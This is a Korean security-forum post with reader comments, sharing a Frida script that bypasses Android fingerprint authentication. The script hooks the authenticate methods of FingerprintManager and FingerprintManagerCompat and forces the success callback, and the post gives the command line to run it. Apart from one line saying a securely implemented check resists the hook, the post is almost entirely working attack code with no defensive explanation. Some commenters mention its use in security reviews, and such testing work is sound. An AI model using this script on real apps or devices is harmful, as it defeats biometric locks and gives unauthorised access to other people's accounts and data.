FingerPrint Authentication Bypass (지문인증우회)

홈 > 안드로이드 > 안드로이드
안드로이드

FingerPrint Authentication Bypass (지문인증우회)

3 쥬스 13 14217 2

지문인증 우회 스크립트입니당 ;)

fee79918380070f869cb6e515724bfd1_1573131008_7709.png


Usage : frida -U -f [package] -l [script.js] --no-pause

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
console.error("[!] Enjoy the hook! - Juice :)");
Java.perform(function () {
 
    console.log('\n');
    
    var FingerprintManager = Java.use('android.hardware.fingerprint.FingerprintManager');
    var FingerprintManagerCompat = Java.use("android.support.v4.hardware.fingerprint.FingerprintManagerCompat");
 
    FingerprintManager.authenticate.overload('android.hardware.fingerprint.FingerprintManager$CryptoObject''android.os.CancellationSignal''int''android.hardware.fingerprint.FingerprintManager$AuthenticationCallback''android.os.Handler').implementation = function(args0, args1, args2, args3, args4){
        console.warn("[!] FingerprintManager.authenticate(args0, args1, args2, args3, args4) Hooked!");
        console.log("\t[*] args0 : " + args0);
        console.log("\t[*] args1 : " + args1);
        console.log("\t[*] args2 : " + args2);
        console.log("\t[*] args3 : " + args3);
        console.log("\t[*] args4 : " + args4);
        args3.onAuthenticationSucceeded(null);
        return this.authenticate(args0, args1, args2, args3, args4);
    };
    
    FingerprintManagerCompat.authenticate.overload('android.support.v4.hardware.fingerprint.FingerprintManagerCompat$CryptoObject''int''android.support.v4.os.CancellationSignal''android.support.v4.hardware.fingerprint.FingerprintManagerCompat$AuthenticationCallback''android.os.Handler').implementation = function(args0, args1, args2, args3, args4){
        console.warn("[!] FingerprintManagerCompat.authenticate(args0, args1, args2, args3, args4) Hooked!");
        console.log("\t[*] args0 : " + args0);
        console.log("\t[*] args1 : " + args1);
        console.log("\t[*] args2 : " + args2);
        console.log("\t[*] args3 : " + args3);
        console.log("\t[*] args4: " + args4);
        args3.onAuthenticationSucceeded(null);
        return this.authenticate(args0, args1, args2, args3, args4);
    };    
});
cs


안전하게 구현된 지문인증은 아래와 같이 안됩니당~

fee79918380070f869cb6e515724bfd1_1573131656_9404.png
 



13 Comments
M LIN 2019.11.07 22:24  
오호 좋은 자료 공유 감사합니다
S 코드몽키 2019.11.08 00:01  
허...지문인증우회라니 +_+
6 Haclthesoul 2019.11.08 00:20  
오호... 이것도 보안성검토 시 요긴하게 쓰이겠네요! ㅎㅎ
20 dldldl 2019.11.08 12:37  
지문인증 우회;; ㄷㄷ ㅋㅋㅋㅋ 와 대단하네요.
1 samangepd 2019.11.08 23:40  
좋은자료 감사합니다
1 치킨한마리 2019.11.12 14:38  
좋은 정보 감사드립니다.
6 하늘사자 2019.11.12 20:42  
좋은 정보 감사드립니다.
1 남궁란마 2019.11.24 11:06  
좋은 정보 감사합니다!
9 단향 2019.11.24 12:50  
오옹... 이거는 지문우회는 처음보네요 신기하군요

Congratulation! You win the 13 축하드립니다! 당첨되셨어요~!

7 래바리 2020.04.03 18:38  
감사합니다.
3 Linjjang 2020.05.08 09:14  
감사합니다
2 zpkkpz 2020.05.24 00:35  
감사합니다!
1 test1212 2021.09.05 19:56  
대응방안은 어떻게 되나요???